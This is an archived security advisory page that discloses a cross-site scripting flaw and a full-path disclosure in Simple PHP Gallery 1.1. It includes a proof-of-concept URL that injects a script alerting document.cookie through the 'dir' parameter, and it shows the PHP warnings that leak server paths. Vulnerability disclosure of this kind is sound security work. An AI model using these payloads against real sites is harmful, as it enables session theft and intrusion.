exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

spg-xss.txt

spg-xss.txt
Posted Nov 27, 2006
Authored by Al7ejaz Hacker

Simple PHP Gallery version 1.1 suffers from a cross site scripting flaw.

tags | exploit, php, xss
SHA-256 | 88944544a16e9dac6f26da14d3579629367896361d5b17fc7edc2343e17c0520
Download | Favorite | View

spg-xss.txt

Change Mirror Download
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                                 ;;ii,,::            +
+                                                 ::::            ::              ;;tt;;::                    +
+                                                 ;;::          ..,,::            ;;ii,,::                    +
+                           ,,,,                ii;;,,          ii;;::            ;;ii,,::                    +
+                           ii::                tt;;,,        ..tt;;,,..          ;;ii;;::                    +
+                         ii,,::                ttii,,        ..ff;;;;::          ;;ii;;::                    +
+                         tt;;::..,,            tt;;,,          ff;;;;ii          ;;ii,,::                    +
+                         tt;;::;;::            tt;;,,..        jj;;,,..          ;;tt,,::                    +
+                         tt;;;;,,              tt;;,,..        tt;;;;            ;;ii;;::                    +
+                     ..::,,;;,,                tt;;,,..        tt;;,,            ;;ii,,::                    +
+                 ..::,,ii;;;;..                tt;;,,..        iiii,,::          ;;ii,,::                    +
+               ::,,ttiijj;;,,                  tt;;;;..        ;;tt,,::          ;;ii,,::                    +
+             ,,;;ii    tt;;,,                  ii;;,,..        ..jj;;::          ;;ii;;::                    +
+           ;;;;::      tt;;::                  tt;;;;..          ff;;::          ;;tt,,..                    +
+         ii;;..      ,,ii;;::                  ii;;,,..          jj;;,,          ;;ii,,..                    +
+       ,,;;,,      ::;;;;;;::                  ii;;;;..          tt;;,,          ;;ii;;..                    +
+       tt;;::::  ::,,;;jj,,::                  tt;;,,..          tt;;,,          ;;ii,,..                    +
+       jj;;;;,,,,,,iiiiii;;::                ..tt;;,,::          iiii,,          ;;ii,,..                    +
+       ;;ffjjttjjttii  ii;;::                ii;;;;;;::          ..jj,,          ;;ii;;..                    +
+           ..;;..      ii;;,,::            ,,;;;;jj;;,,          ..jj,,          ;;ii,,..                    +
+                       iiii;;,,::::....::,,,,;;,,jj;;;;,,::    ::,,;;,,          ;;ii;;                      +
+                       ..ff;;;;;;,,,,::,,;;;;;;  ttii;;;;,,,,,,,,;;;;::          ;;ii,,                      +
+                         jjii;;;;;;;;;;;;;;ii..  ..ff;;;;;;;;;;;;;;;;            ;;ii,,                      +
+                           jjjj;;;;ii;;;;tt..      iijj;;;;;;;;;;ii::            ;;ii::                      +
+                             iijjjjjjtt;;            ;;ffffjjjjtt::              ;;ii                        +
+                                                           ;;..                  ii;;                        +
+                                                                                 ..                   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Credit by : Al7ejaz Hacker                            +
+                                  +
+Script : Simple PHP Gallery 1.1                          +
+Impact : Cross site scripting & fullpath disclosure                      +
+                                  +
+                                  +
+Fullpath disclosure :                              +
+                                  +
+http://localhost/sp_index.php?dir=[Somthingwrong]                      +
+                                  +
+Result                                  +
+                                  +
+                                  +
+Warning: opendir(123): failed to open dir: No such file or directory in /var/www/html/gallery/sp_helper_functions.php on line 10  +
+                                  +
+Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/html/gallery/sp_helper_functions.php on line 11  +
+                                  +
+Warning: Invalid argument supplied for foreach() in /var/www/html/gallery/sp_def_vars.php on line 147          +
+                                  +
+                                  +
+                                  +
+                                  +
+Cross Site Scripting                              +
+                                  +
+                                  +
+                                  +
+dir variable is not probrely verified and can be used to execute html and javascript code            +
+                                  +
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script>                +
+                                  +
+/Milw0rm                                +
+                                  +
+                                  +
+in subject hot :  Cross site scripting & fullpath disclosure  ;)                  +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close